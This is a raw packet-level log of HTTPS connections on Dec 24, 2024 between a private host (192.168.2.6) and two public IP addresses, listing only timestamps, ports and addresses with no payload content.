                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.609576941 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.610444069 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.610637903 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.611182928 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.611196995 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.612665892 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.612845898 CET44362882172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.613090038 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.614516973 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.615129948 CET62882443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.623327017 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.623462915 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.623477936 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.623492002 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.623714924 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.625529051 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:36.652720928 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.981659889 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.981676102 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.981688976 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.981703997 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.981739998 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.981751919 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.981843948 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.981857061 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.981872082 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:37.983644962 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.000888109 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.000901937 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.000972033 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.001039028 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.001050949 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.001178026 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.001188993 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.001200914 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.001214027 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.001292944 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.002865076 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032274008 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032300949 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032330990 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032397985 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032413006 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032461882 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032493114 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032505989 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032603979 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.032624006 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.037280083 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040234089 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040313005 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040326118 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040358067 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040369987 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040469885 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040481091 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040493965 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040607929 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040618896 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.040627003 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.053750038 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.059658051 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.059736967 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.059750080 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.059765100 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.060129881 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.060168028 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.060182095 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.060287952 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.060364962 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.060376883 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.060610056 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.079144001 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.079195976 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.079210043 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.079267025 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.079281092 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.084578991 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.123667955 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.128884077 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.128998995 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129055977 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129067898 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129081964 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129173994 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129273891 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129287004 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129296064 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129300117 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129313946 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129327059 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.129633904 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.148333073 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.148446083 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.489336967 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.489372969 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.498089075 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.506361961 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.506392956 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.506450891 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.506494999 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.506608009 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.506678104 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.512728930 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.512840986 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.512975931 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.513024092 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.513747931 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.513817072 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.518978119 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.528276920 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.529200077 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.544148922 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.544534922 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.710092068 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.717756033 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.717864990 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.718070984 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.718121052 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.718135118 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.718147993 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.748369932 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.758184910 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.762156010 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.764776945 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.765794039 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.767290115 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.809685946 CET50274443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.823858023 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.824217081 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.824301004 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.830092907 CET4435027423.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.839112043 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.848871946 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851268053 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851407051 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851460934 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851495028 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851547003 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851581097 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851614952 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851649046 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851700068 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851701975 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851737022 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851769924 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.851804018 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.852042913 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860488892 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860544920 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860595942 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860630035 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860663891 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860697985 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860733032 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860805988 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860841036 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.860877991 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.861136913 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.870654106 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.870754004 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.870788097 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.870876074 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.870898962 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.871490002 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.871623039 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.871931076 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.872092962 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.872128963 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.872186899 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:38.907186031 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477214098 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477226973 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477238894 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477363110 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477375031 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477456093 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.477663040 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482476950 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.482933044 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.485544920 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.486835003 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.490392923 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.643466949 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.658473969 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.667767048 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.667846918 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.668095112 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.668098927 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.668107986 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.668123007 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.672930002 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.723952055 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.730458975 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737066984 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737205982 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737240076 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737329006 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737339020 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737365007 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.737567902 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.756333113 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.811695099 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824364901 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824378014 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824619055 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824645042 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824657917 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824671030 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824682951 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824693918 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.824703932 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.825923920 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826035023 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826087952 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826100111 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826109886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826138973 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.826752901 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.828671932 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.829705000 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.829765081 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830008030 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830100060 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830112934 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830228090 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830239058 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.830249071 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.831630945 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.833916903 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.836632967 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837430954 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837701082 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837773085 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837785006 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837908030 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837919950 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837933064 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.837944984 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.838049889 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.838063002 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.838076115 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.838222027 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.839766026 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.850018978 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.850101948 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.850115061 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:39.850203037 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421786070 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421798944 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421896935 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.421914101 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.422580957 CET54108443192.168.2.623.209.72.39
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.436256886 CET4435410823.209.72.39192.168.2.6
                                                                                                                                                                                                                                                                                                        Dec 24, 2024 19:28:40.436286926 CET4435410823.209.72.39192.168.2.6
